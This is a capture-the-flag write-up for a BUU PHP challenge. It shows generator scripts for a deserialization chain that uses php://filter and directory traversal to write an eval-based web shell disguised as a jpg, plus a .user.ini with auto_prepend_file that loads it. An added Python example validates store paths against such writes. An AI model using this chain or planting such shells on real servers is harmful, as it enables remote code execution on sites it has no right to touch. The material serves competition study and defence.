BUU red-packet challenge writeup

Many thanks to Zhao for setting this challenge (Boss Zhao is great); I'm recording my solution approach here.

The challenge ships its source code, and the code looks very familiar: compare it with ezpop from the earlier university ops contest (高校运维赛).

The differences are one extra step that randomises the file name, plus a check on the file extension that forbids php.

University ops contest writeup: https://250.ac.cn/2019/11/21/2019-EIS-WriteUp/#ezpop

My first idea was to bypass the extension check and then brute-force the file name, but after some attempts that failed.

Testing showed that directory traversal is possible, which removes the need to brute-force the file name: use .user.ini to automatically load a jpg, and that jpg contains the shell.

https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html

The solution goes as follows.

First upload an image file that contains the shell:

```php
<?php
// Classes A and B come from the challenge source and are not reproduced here.
// B is the cache store; its options control how the cache file is written.
$b = new B();
$b->writeTimes = 0;
$b->options = array(
    'serialize'     => "base64_decode",   // decode our base64 data before writing
    'data_compress' => false,
    // The write goes through a base64-decode filter; the resource path is the
    // "prefix" the key is appended to.
    'prefix'        => "php://filter/write=convert.base64-decode/resource=uploads/moyu",
);

// The key traverses out of the uploads directory, so the file lands in the web root as aaaaaa.jpg.
$a = new A($store = $b, $key = "/../../aaaaaa.jpg", $expire = 0);
$a->autosave = false;
$a->cache = array();
// 'qaq' is padding that fixes the base64 alignment of the header the cache writer prepends.
$a->complete = base64_encode('qaq' . base64_encode('<?php @eval($_POST["moyu"]);?>'));

echo urlencode(serialize($a));
```

Then upload the .user.ini:

```php
<?php
// Same store as above; only the key and the written content change.
$b = new B();
$b->writeTimes = 0;
$b->options = array(
    'serialize'     => "base64_decode",
    'data_compress' => false,
    'prefix'        => "php://filter/write=convert.base64-decode/resource=uploads/moyu",
);

// Write .user.ini into the web root, next to aaaaaa.jpg.
$a = new A($store = $b, $key = "/../../.user.ini", $expire = 0);
$a->autosave = false;
$a->cache = array();
// auto_prepend_file makes PHP include aaaaaa.jpg before every script in that directory.
$a->complete = base64_encode('qaq' . base64_encode("\nauto_prepend_file=aaaaaa.jpg"));

echo urlencode(serialize($a));
```
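The two writes above succeed because the only check is "extension is not php" on a path built from prefix + key. As an added example (not part of the challenge or this writeup), here is the kind of check that would have stopped both steps; the web root and upload directory paths are assumed.

```python
import posixpath
from typing import Optional

# Assumed layout (constructed for this example).
WEB_ROOT = "/var/www/html"
UPLOAD_DIR = posixpath.join(WEB_ROOT, "uploads")
# Extensions that must never be writable through the cache store.
BLOCKED_EXT = {"php", "phtml", "phar", "ini", "htaccess"}


def resolve_store_path(prefix: str, key: str) -> Optional[str]:
    """Return the absolute path that prefix+key would write to, or None if rejected.

    Rejects stream wrappers, directory traversal out of the upload directory,
    dotfiles (.user.ini, .htaccess) and blocked extensions.
    """
    # php://filter and friends must never reach the filesystem layer.
    if "://" in prefix or "://" in key:
        return None
    # The challenge concatenates prefix and key; resolve that relative to the web root.
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, prefix + key))
    # The normalised path must stay inside UPLOAD_DIR (blocks /../../aaaaaa.jpg).
    if not resolved.startswith(UPLOAD_DIR + "/"):
        return None
    name = posixpath.basename(resolved)
    # Dotfiles are server configuration, not uploads.
    if name.startswith("."):
        return None
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext in BLOCKED_EXT:
        return None
    return resolved
```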

As you can see, we have successfully got a shell.

All that remains is reading the flag.
